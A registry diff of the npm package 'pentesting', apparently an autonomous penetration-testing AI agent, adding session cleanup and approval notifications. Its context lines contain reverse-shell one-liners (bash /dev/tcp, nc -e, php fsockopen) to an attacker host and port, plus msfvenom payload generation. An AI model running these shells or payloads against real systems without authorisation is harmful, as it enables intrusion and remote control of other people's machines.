pentesting 0.7.33 → 0.7.35

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/dist/index.js +100 -5
  2. package/package.json +1 -1
package/dist/index.js CHANGED
@@ -1925,7 +1925,7 @@ async function executeMetasploit(input) {
1925
1925
  return executeBash(`msfconsole -q -x "${command}; exit"`, { timeout: 3e5 });
1926
1926
  }
1927
1927
  async function generatePayload(input) {
1928
- const { payload_type, lhost, lport, platform: platform2, format, encoder, output } = input;
1928
+ const { payload_type, lhost, lport, platform: platform3, format, encoder, output } = input;
1929
1929
  const payloads = {
1930
1930
  windows: {
1931
1931
  reverse_tcp: "windows/meterpreter/reverse_tcp",
@@ -1944,7 +1944,7 @@ async function generatePayload(input) {
1944
1944
  reverse_tcp: "python/meterpreter/reverse_tcp"
1945
1945
  }
1946
1946
  };
1947
- const payloadName = payloads[platform2]?.[payload_type] || `${platform2}/meterpreter/reverse_tcp`;
1947
+ const payloadName = payloads[platform3]?.[payload_type] || `${platform3}/meterpreter/reverse_tcp`;
1948
1948
  let cmd = `msfvenom -p ${payloadName} LHOST=${lhost} LPORT=${lport}`;
1949
1949
  if (format) cmd += ` -f ${format}`;
1950
1950
  if (encoder) cmd += ` -e ${encoder}`;
@@ -2276,7 +2276,7 @@ async function executeMysqlClient(input) {
2276
2276
  return executeBash(cmd, { timeout: 6e4 });
2277
2277
  }
2278
2278
  async function executeReverseShell(input) {
2279
- const { type, lhost, lport, platform: platform2, encode } = input;
2279
+ const { type, lhost, lport, platform: platform3, encode } = input;
2280
2280
  const shells = {
2281
2281
  bash: `bash -i >& /dev/tcp/${lhost}/${lport} 0>&1`,
2282
2282
  nc: `nc -e /bin/bash ${lhost} ${lport}`,
@@ -2285,7 +2285,7 @@ async function executeReverseShell(input) {
2285
2285
  php: `php -r '$sock=fsockopen("${lhost}",${lport});exec("/bin/bash <&3 >&3 2>&3");'`
2286
2286
  };
2287
2287
  if (type === "msfvenom") {
2288
- const payload = platform2 === "windows" ? "windows/x64/shell_reverse_tcp" : "linux/x64/shell_reverse_tcp";
2288
+ const payload = platform3 === "windows" ? "windows/x64/shell_reverse_tcp" : "linux/x64/shell_reverse_tcp";
2289
2289
  return executeBash(`msfvenom -p ${payload} LHOST=${lhost} LPORT=${lport} -f exe -o /tmp/shell.exe && echo "Payload saved to /tmp/shell.exe"`);
2290
2290
  }
2291
2291
  let shellCmd = shells[type] || shells.bash;
@@ -5492,6 +5492,51 @@ var SessionManager = class extends EventEmitter5 {
5492
5492
  return [];
5493
5493
  }
5494
5494
  }
5495
+ /**
5496
+ * Clean up old sessions (older than maxAgeDays)
5497
+ */
5498
+ async cleanupOldSessions(maxAgeDays = 7) {
5499
+ const sessions = await this.listSessions();
5500
+ const now = Date.now();
5501
+ const maxAgeMs = maxAgeDays * 24 * 60 * 60 * 1e3;
5502
+ let deletedCount = 0;
5503
+ for (const session of sessions) {
5504
+ const sessionAge = now - new Date(session.updatedAt).getTime();
5505
+ if (sessionAge > maxAgeMs && session.status !== "active") {
5506
+ const deleted = await this.deleteSession(session.id);
5507
+ if (deleted) {
5508
+ deletedCount++;
5509
+ }
5510
+ }
5511
+ }
5512
+ if (deletedCount > 0) {
5513
+ this.emit("sessions_cleaned", { count: deletedCount });
5514
+ }
5515
+ return deletedCount;
5516
+ }
5517
+ /**
5518
+ * Clean up empty or corrupted sessions
5519
+ */
5520
+ async cleanupInvalidSessions() {
5521
+ await this.initialize();
5522
+ let deletedCount = 0;
5523
+ try {
5524
+ const entries = await fs3.readdir(this.sessionsDir, { withFileTypes: true });
5525
+ for (const entry of entries) {
5526
+ if (entry.isDirectory()) {
5527
+ const metadataPath = path3.join(this.sessionsDir, entry.name, "metadata.json");
5528
+ try {
5529
+ await fs3.access(metadataPath);
5530
+ } catch {
5531
+ await fs3.rm(path3.join(this.sessionsDir, entry.name), { recursive: true });
5532
+ deletedCount++;
5533
+ }
5534
+ }
5535
+ }
5536
+ } catch {
5537
+ }
5538
+ return deletedCount;
5539
+ }
5495
5540
  /**
5496
5541
  * Get most recent session
5497
5542
  */
@@ -6128,6 +6173,45 @@ function hasClipboardImage() {
6128
6173
  return false;
6129
6174
  }
6130
6175
 
6176
+ // src/utils/notification.ts
6177
+ import { exec as exec2 } from "child_process";
6178
+ import { platform as platform2 } from "os";
6179
+ function sendNotification(options) {
6180
+ const { title, message, sound = true } = options;
6181
+ const os = platform2();
6182
+ try {
6183
+ if (os === "darwin") {
6184
+ const soundOption = sound ? 'sound name "Ping"' : "";
6185
+ const script = `display notification "${escapeQuotes(message)}" with title "${escapeQuotes(title)}" ${soundOption}`;
6186
+ exec2(`osascript -e '${script}'`);
6187
+ } else if (os === "linux") {
6188
+ exec2(`notify-send "${escapeQuotes(title)}" "${escapeQuotes(message)}"`);
6189
+ } else if (os === "win32") {
6190
+ const ps = `
6191
+ [Windows.UI.Notifications.ToastNotificationManager, Windows.UI.Notifications, ContentType = WindowsRuntime] | Out-Null
6192
+ $Template = [Windows.UI.Notifications.ToastTemplateType]::ToastText02
6193
+ $Xml = [Windows.UI.Notifications.ToastNotificationManager]::GetTemplateContent($Template)
6194
+ $Xml.GetElementsByTagName('text')[0].AppendChild($Xml.CreateTextNode('${escapeQuotes(title)}')) | Out-Null
6195
+ $Xml.GetElementsByTagName('text')[1].AppendChild($Xml.CreateTextNode('${escapeQuotes(message)}')) | Out-Null
6196
+ $Notifier = [Windows.UI.Notifications.ToastNotificationManager]::CreateToastNotifier('Pentesting')
6197
+ $Notifier.Show([Windows.UI.Notifications.ToastNotification]::new($Xml))
6198
+ `;
6199
+ exec2(`powershell -Command "${ps}"`);
6200
+ }
6201
+ } catch {
6202
+ }
6203
+ }
6204
+ function escapeQuotes(str) {
6205
+ return str.replace(/"/g, '\\"').replace(/'/g, "'\\''");
6206
+ }
6207
+ function notifyApprovalNeeded(toolName) {
6208
+ sendNotification({
6209
+ title: "Pentesting - Approval Required",
6210
+ message: `Action requires approval: ${toolName}`,
6211
+ sound: true
6212
+ });
6213
+ }
6214
+
6131
6215
  // src/config/theme.ts
6132
6216
  var THEME = {
6133
6217
  // Backgrounds (dark to light grays)
@@ -6585,7 +6669,17 @@ var App = ({ autoApprove = false, target }) => {
6585
6669
  }
6586
6670
  });
6587
6671
  });
6588
- }, []);
6672
+ sessionManager2.cleanupOldSessions(7).then((count) => {
6673
+ if (count > 0) {
6674
+ console.log(`[Session] Cleaned up ${count} old sessions`);
6675
+ }
6676
+ });
6677
+ sessionManager2.cleanupInvalidSessions().then((count) => {
6678
+ if (count > 0) {
6679
+ console.log(`[Session] Removed ${count} invalid sessions`);
6680
+ }
6681
+ });
6682
+ }, [sessionManager2]);
6589
6683
  const startTimeRef = useRef(0);
6590
6684
  const timerRef = useRef(null);
6591
6685
  const addMessage = useCallback((type, content, duration) => {
@@ -6743,6 +6837,7 @@ var App = ({ autoApprove = false, target }) => {
6743
6837
  toolInput: data.toolInput,
6744
6838
  riskLevel: data.riskLevel
6745
6839
  });
6840
+ notifyApprovalNeeded(data.toolName);
6746
6841
  addMessage(MESSAGE_TYPE.SYSTEM, `APPROVAL NEEDED: ${data.toolName} (${data.riskLevel} risk)`);
6747
6842
  const inputPreview = Object.entries(data.toolInput).slice(0, 2).map(([k, v]) => `${k}=${typeof v === "string" ? v.slice(0, 40) : JSON.stringify(v).slice(0, 40)}`).join(", ");
6748
6843
  if (inputPreview) {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "pentesting",
3
- "version": "0.7.33",
3
+ "version": "0.7.35",
4
4
  "description": "Autonomous Penetration Testing AI Agent",
5
5
  "type": "module",
6
6
  "main": "dist/index.js",